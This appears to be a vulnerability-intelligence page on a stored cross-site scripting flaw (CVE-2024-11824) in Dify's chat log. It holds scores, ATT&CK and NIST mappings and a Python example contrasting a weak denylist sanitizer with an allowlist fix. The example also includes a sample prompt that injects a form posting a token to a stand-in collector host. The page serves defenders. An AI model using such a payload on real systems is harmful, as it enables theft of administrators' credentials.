Cyber Posture

CVE-2024-11824

High · Public PoC

Published: 20 March 2025
Modified: 14 July 2025
KEV Added: not listed
Patch: fixed in version 0.12.1
CVSS Score: 7.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)
EPSS Score: 0.0027 (50.0th percentile)
Risk Priority: 15 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2024-11824 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Langgenius Dify. Its CVSS base score is 7.6 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 50.0% of CVEs by exploit likelihood, is not currently listed in the CISA KEV catalog, and has a public proof-of-concept referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190) and 1 other technique. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)

Prevent: SI-15 (Information Output Filtering) directly prevents stored XSS by filtering malicious HTML out of chat log output before it is rendered in the admin's browser.

Prevent: SI-10 (Information Input Validation) validates prompt input to chat logs, blocking malicious HTML tags such as <input> and <form> before storage.

Prevent: SI-9 restricts chat log inputs to safe content, disallowing the dangerous HTML tags that enable the stored XSS vulnerability.

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access): Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1056.003 Web Portal Capture (Collection): Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit the credentials of users who attempt to log into the service.

Why these techniques?

Stored XSS in the web application enables exploitation of a public-facing application (T1190), and the HTML rendered to an admin viewing the tainted log acts as web portal capture, stealing credentials or sensitive data (T1056.003).

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

NVD Description

A stored cross-site scripting (XSS) vulnerability exists in langgenius/dify version latest, specifically in the chat log functionality. The vulnerability arises because certain HTML tags like <input> and <form> are not disallowed, allowing an attacker to inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information. This issue is fixed in version 0.12.1.

Deeper analysis

CVE-2024-11824 is a stored cross-site scripting (XSS) vulnerability in the langgenius/dify application, specifically within its chat log functionality. The flaw affects the latest version prior to the patch and occurs because certain HTML tags, such as <input> and <form>, are not properly disallowed. This allows attackers to inject malicious HTML into chat logs via prompts. The vulnerability carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N) and maps to CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').

A low-privileged user (PR:L) can exploit the vulnerability by submitting prompts containing malicious HTML, which becomes stored in the chat log. When an administrator views the tainted log, the injected script executes in the admin's browser context due to insufficient sanitization, enabling the attacker to steal the admin's credentials or other sensitive information. Exploitation requires network access and user interaction from the victim (UI:R), but achieves high confidentiality impact with changed scope (S:C).

The issue is addressed in Dify version 0.12.1, with the fix implemented in commit 55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d available at https://github.com/langgenius/dify/commit/55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d. Security teams should prioritize upgrading to the patched version. Further details, including the original report, are provided in the Huntr bounty advisory at https://huntr.com/bounties/72387deb-6e64-48ed-a8c3-b50d22a0970f.
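The control pattern the advisory calls for, as an added example that is neither Dify's code nor the fix in the referenced commit: a hypothetical denylist of the kind that lets <input> and <form> through, beside an allowlist rebuild that implements SI-10 at intake and SI-15 at render time, plus a small helper for auditing entries already stored in a log. The tag sets, function names and sample prompt are constructed for this example.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical denylist of the kind the advisory describes: it never names
# <input> or <form>, so both reach the stored log untouched.
WEAK_DENYLIST = {"script", "iframe", "object", "embed"}
# Allowlist of the formatting tags a chat log actually needs; attributes are
# dropped, so no action/href/src/on* handler can ride along on a kept tag.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "code", "pre", "br"}

class _Rebuilder(HTMLParser):
    """Re-emits tags accepted by `keep`, escapes all text, drops everything else."""
    def __init__(self, keep, raw_tags):
        super().__init__(convert_charrefs=True)
        self.keep, self.raw_tags, self.out = keep, raw_tags, []
    def handle_starttag(self, tag, attrs):
        if self.keep(tag):  # denylist mode copies the original tag text verbatim
            self.out.append(self.get_starttag_text() if self.raw_tags else f"<{tag}>")
    def handle_endtag(self, tag):
        if self.keep(tag) and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text never becomes markup

def _rebuild(html, keep, raw_tags):
    p = _Rebuilder(keep, raw_tags)
    p.feed(html); p.close()
    return "".join(p.out)

def sanitize_denylist(html):
    """Vulnerable pattern: only known-bad tags are removed, everything else is kept."""
    return _rebuild(html, lambda t: t not in WEAK_DENYLIST, raw_tags=True)

def sanitize_allowlist(html):
    """Fixed pattern (SI-10 at intake, SI-15 at render): only known-good tags survive."""
    return _rebuild(html, lambda t: t in ALLOWED_TAGS, raw_tags=False)

class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__(); self.tags = set()
    def handle_starttag(self, tag, attrs): self.tags.add(tag)

def unexpected_tags(html):
    """Audit helper: non-allowlisted tags found in an entry already sitting in the log."""
    c = _TagCollector(); c.feed(html); c.close()
    return c.tags - ALLOWED_TAGS

# Constructed sample prompt of the shape the advisory describes (not a real payload).
SAMPLE_PROMPT = ('Hello <b>admin</b> '
                 '<form action="https://collector.example/x"><input name="token"></form>')
```

Running unexpected_tags over existing log rows gives a quick inventory of entries that the weak filter let through before the upgrade.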

Details

CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation)

Affected Products

langgenius / dify, versions ≤ 0.12.1

CVEs Like This One

CVE-2024-10252 (same product: Langgenius Dify)
CVE-2025-1796 (same product: Langgenius Dify)
CVE-2024-12039 (same product: Langgenius Dify)
CVE-2025-24593 (shared CWE-79)
CVE-2025-24615 (shared CWE-79)
CVE-2026-23807 (shared CWE-79)
CVE-2025-27005 (shared CWE-79)
CVE-2025-68520 (shared CWE-79)
CVE-2026-0800 (shared CWE-79)
CVE-2025-26555 (shared CWE-79)

References